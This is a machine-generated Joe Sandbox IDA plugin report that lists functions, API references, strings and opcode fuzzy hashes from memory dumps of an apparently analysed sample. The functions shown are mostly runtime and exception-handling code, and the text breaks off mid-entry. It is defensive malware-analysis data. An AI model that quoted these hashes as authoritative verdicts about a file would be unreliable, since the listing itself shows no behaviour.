Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction ID: 0962f6c1ff0f3b1346b15cdc3083d10c5537d059addc9f16929a96a363b2ed98
Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
Instruction Fuzzy Hash: 9551B331B1DA428ADB94CB16D464A787392EB45FB8F1081F2DA4E477A6EF7DE841C700

Function 00007FFE1A5159C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A5159F0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE1A515AD8

Strings

csm, xrefs: 00007FFE1A515B2A
csm, xrefs: 00007FFE1A515A12

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction ID: 83fc2d36671c7e545f831268309094aa13c79419e7f65d97d557f28b084cb995
Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
Instruction Fuzzy Hash: 7D51933270CB428ADB648B22949437877A2EB56FA9F1841F7DA5D477A5CF3CE451C700

Function 00007FFE1A5151D8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FFE1A515237
_CallSETranslator.LIBVCRUNTIME ref: 00007FFE1A515283

Strings

RCC, xrefs: 00007FFE1A515253
MOC, xrefs: 00007FFE1A51524B

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction ID: 8796d5cdbdf9be1d799c6108bc7b00a0a488b1119c77dfeb77f6c4f438cb440b
Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
Instruction Fuzzy Hash: 00618472A0CBC581D7608B26E4403BAB7A1FB85BA8F4442B6EB9D07765DF7CD190CB00

Function 000000014000EDC0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 57libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

GetModuleHandleA.KERNEL32 ref: 000000014000EE2D
GetProcAddress.KERNEL32 ref: 000000014000EE42

Strings

InitializeCriticalSectionAndSpinCount, xrefs: 000000014000EE38
kernel32.dll, xrefs: 000000014000EE26

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: AddressHandleLoadModuleProc
String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
API String ID: 3055805555-3733552308
Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700

Function 00000001400026F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 000000014000271C
GetCurrentProcess.KERNEL32 ref: 0000000140002721
SetProcessWorkingSetSize.KERNEL32 ref: 0000000140002731

Strings

Shrinking process size, xrefs: 000000014000270E

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: Process$CurrentSizeWorking
String ID: Shrinking process size
API String ID: 2122760700-652428428
Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310

Function 00000001400030B0 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00000001400030E7
LeaveCriticalSection.KERNEL32 ref: 000000014000316B
EnterCriticalSection.KERNEL32 ref: 0000000140003195
EnterCriticalSection.KERNEL32 ref: 00000001400031C6
LeaveCriticalSection.KERNEL32 ref: 00000001400031DD

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalSection$Enter$Leave
String ID:
API String ID: 2801635615-0
Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744

Function 00007FFE1A51E3F4 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00007FFE1A51E473
WriteFile.KERNEL32 ref: 00007FFE1A51E73B
WriteFile.KERNEL32 ref: 00007FFE1A51E781
GetLastError.KERNEL32 ref: 00007FFE1A51E837

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: FileWrite$ConsoleErrorLastOutput
String ID:
API String ID: 2718003287-0
Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction ID: c3bdf5fc096c64068d07cd8c26a0ffa865e01ceaee71b160340412b538af1c01
Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
Instruction Fuzzy Hash: DDD1D072B0CA8199E711CF66D4402FC37B2FB45BA8B4442B6DE9D97BA9DE38D446C340

Function 00007FFE1A51ED1C Relevance: 6.2, APIs: 4, Instructions: 218COMMON

Download Yara Rule

APIs

GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EE38
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFE1A51ED07), ref: 00007FFE1A51EEC3

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ConsoleErrorLastMode
String ID:
API String ID: 953036326-0
Opcode ID: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction ID: 8209a21af82db85e05bf9a8d19e659e7deeeb1412c212b39ada2aaaf9940838b
Opcode Fuzzy Hash: 011e2ebe13567d8ad8ddad1d699b44402174a3121c3ef3043a650edb943c864e
Instruction Fuzzy Hash: 0191B3A2F1CE5185F7509B6694806BC2BA2AB06FA8F1441FBDE0E576A4DF38D486D700

Function 0000000140004760 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004774
ResetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 0000000140004870
SetEvent.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000487D
LeaveCriticalSection.KERNEL32(?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 000000014000488A

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction ID: 8df361fa7c869b6ec715234f9c2df2ced8c6baf833446e4218a9444c3b5dacad
Opcode Fuzzy Hash: c0905a8df1c3b6d7d2917c1fcaa4435d9a1a27abfa891a899b8a9d6119ba031b
Instruction Fuzzy Hash: 0F31D1B5614F4881EB42CB57F8803D463A6B79CBD4F984516EB0E8B372EF3AC4958304

Function 0000000140004400 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 000000014000441F
ResetEvent.KERNEL32 ref: 00000001400044CB
SetEvent.KERNEL32 ref: 00000001400044D5
LeaveCriticalSection.KERNEL32 ref: 00000001400044DF

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction ID: 80aeca48758360c6ba791d23c15ba34d7cc547f8c7a26c6fbcbbb07f4ec0a80e
Opcode Fuzzy Hash: 6e550663b123c7b4300ff756dd79b72a11867f34fdb7ecd18ec55ee4b4ab60ba
Instruction Fuzzy Hash: 6F3127B2220A8483D761DF27F48439AB3A0F798BD4F000116EB8A47BB5DF39E491C344

Function 00007FFE1A512218 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FFE1A512244
GetCurrentThreadId.KERNEL32 ref: 00007FFE1A512252
GetCurrentProcessId.KERNEL32 ref: 00007FFE1A51225E
QueryPerformanceCounter.KERNEL32 ref: 00007FFE1A51226E

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction ID: 99074bbcaeb6ee96d02f745326b2312403cfb503c9c3e2833dcdd3fb923fde4c
Opcode Fuzzy Hash: 540efdc4acb7237d38814a0210c5b4881e051432956c40de0382b68ade111df8
Instruction Fuzzy Hash: 53111C26B18F018AEB008BA1E8556B833A5F75AB68F440A72DA6D467B4EF7CD159C340

Function 0000000140013670 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 000000014001367B
CreateEventW.KERNEL32 ref: 000000014001368D
CreateEventW.KERNEL32 ref: 00000001400136A7
CreateEventW.KERNEL32 ref: 00000001400136C0

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: CreateEvent$CriticalInitializeSection
String ID:
API String ID: 926662266-0
Opcode ID: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction ID: 312f8d8d13b8a868d26f937b45fb8075aed367f1a83d8c92d196673213f535ba
Opcode Fuzzy Hash: 6e7557a2c0ebfea515044b23bc829654ad5a6134d5329468471647cedafa6715
Instruction Fuzzy Hash: 8F015A31610F0582E726DFA2B855BCA37E2F75D385F854529FA4A8B630EF3A8145C700

Function 00007FFE1A515C00 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A515C2A

Strings

csm, xrefs: 00007FFE1A515DBE
csm, xrefs: 00007FFE1A515C4F

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: __except_validate_context_record
String ID: csm$csm
API String ID: 1467352782-3733052814
Opcode ID: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction ID: cc163d2ed52992b12ccb5b176fd598443197ca996c9be1a7dd019399f5a25fae
Opcode Fuzzy Hash: 7b854735182fbbf9032f6bb379489979c6e7540e10eb2e5c3fda445f13d9ec39
Instruction Fuzzy Hash: 79718272B0CA818AD7608F26D444B7D7BA2EB06FA8F1881F6DE4C47AA5CB3CD551C740

Function 00007FFE1A516298 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A516342
_CreateFrameInfo.LIBVCRUNTIME ref: 00007FFE1A51636B

Strings

csm, xrefs: 00007FFE1A51646B

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: CreateFrameInfo__except_validate_context_record
String ID: csm
API String ID: 2558813199-1018135373
Opcode ID: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction ID: 17a6df69f5b8bd89d9d2f92c59730d1f10af3a9a6bddec5e78e0965cb6eeaf45
Opcode Fuzzy Hash: fdc43af78747129a673bd1320e44d2e2152711131f73500a528a0e9cffec3944
Instruction Fuzzy Hash: 71514D3671DB4196D660AF16A04127D7BA5FB8AFB0F1005B6EB8D07B66DF38E451CB00

Function 00007FFE1A51EA8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FFE1A51EBA3
GetLastError.KERNEL32 ref: 00007FFE1A51EBC5

Strings

U, xrefs: 00007FFE1A51EB4F

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction ID: e5cc03a6032945dbccd653eb8707596d6f43ec8a5330c4b63f0d1ae64d07c29a
Opcode Fuzzy Hash: 1bda24f103a1684070c02434e8f6c76fd55582b454c16690d6623519bbb42c9a
Instruction Fuzzy Hash: FE41A562B1DA4181DB20CF66E4443BA7762FB99BA4F4541B2EE4E877A4EF3CD441CB40

Function 0000000140012523 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 000000014001256D
RaiseException.KERNEL32 ref: 000000014001258A

Strings

csm, xrefs: 00000001400125BE

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: ExceptionRaise
String ID: csm
API String ID: 3997070919-1018135373
Opcode ID: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction ID: 49e9958dea4625aba6399e71a496f31833793ec74c7c4936f150dd50c3eb5df3
Opcode Fuzzy Hash: dba88b77ed38871436108f768fa7b3f2c7bfcf036fc2a4a051b753ac1ce5513b
Instruction Fuzzy Hash: 1D315036204A8082D771CF16E09079EB365F78C7E4F544111EF9A077B5DB3AD892CB41

Function 00007FFE1A520910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE1A513A38: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFE1A513A63

__GSHandlerCheckCommon.LIBCMT ref: 00007FFE1A520993

Strings

csm, xrefs: 00007FFE1A52092B
f, xrefs: 00007FFE1A520925

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: CheckCommonHandler__except_validate_context_record
String ID: csm$f
API String ID: 1543384424-629598281
Opcode ID: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction ID: 4767d3139cfe538b553dffc3081010f9f75b09a9a966cdfcf56a0960c06ceb7d
Opcode Fuzzy Hash: df4735a4e908aa111fba586a5857847e844898d503be1ccfbed92f1abe6d2401
Instruction Fuzzy Hash: 9211E172B18B81C5E7549F23A0411B97B66EB46FE0F0880B6EE880BB66CE38DC51C700

Function 0000000140003620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003665
#4.VSELOG ref: 00000001400036AC

Strings

amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d, xrefs: 000000014000368F

Memory Dump Source

Source File: 00000004.00000002.2270042634.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2270029354.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270058715.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270072395.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2270085400.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_lOXFJk.jbxd

Similarity

API ID: TimerWaitable
String ID: amps_Set: pHandle=%p, propId=%d, val=%p, vSize=%d
API String ID: 1823812067-484248852
Opcode ID: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction ID: 814455377fd743a09d1ce94c7697c2570c7384a68551c8a3e3690f56dccab0e4
Opcode Fuzzy Hash: 590ed17bb6164494f623543e183e49ebce91c212c09f63c64337d20ba62503d7
Instruction Fuzzy Hash: 25114975608B4082EB21CF16B84079AB7A4F79DBD4F544225FF8847B79DB39C5508B40

Function 00007FFE1A513990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A5139E0
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFE1A51112F), ref: 00007FFE1A513A21

Strings

csm, xrefs: 00007FFE1A513A0E

Memory Dump Source

Source File: 00000004.00000002.2270112348.00007FFE1A511000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE1A510000, based on PE: true

Associated: 00000004.00000002.2270099739.00007FFE1A510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270127896.00007FFE1A522000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270142498.00007FFE1A52D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2270155456.00007FFE1A52F000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe1a510000_lOXFJk.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction ID: 5d0314be8a28072ba4f3b46a76935b8f9882d3f4705911f625d1c289e4b4dd63
Opcode Fuzzy Hash: 886c576564c2cc2de453fb1cc39b3a925429a78efbd1798258f32c7f13ed655c
Instruction Fuzzy Hash: E1114C3660CF8182EB608F16E4102797BE5FB89BA4F5842B2DE8D07769EF3CD5518B00

Function 00000001400036E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39timeCOMMON

Download Yara Rule

APIs

SetWaitableTimer.KERNEL32 ref: 0000000140003725
#4.VSELOG ref: 0000000140003762

Strings

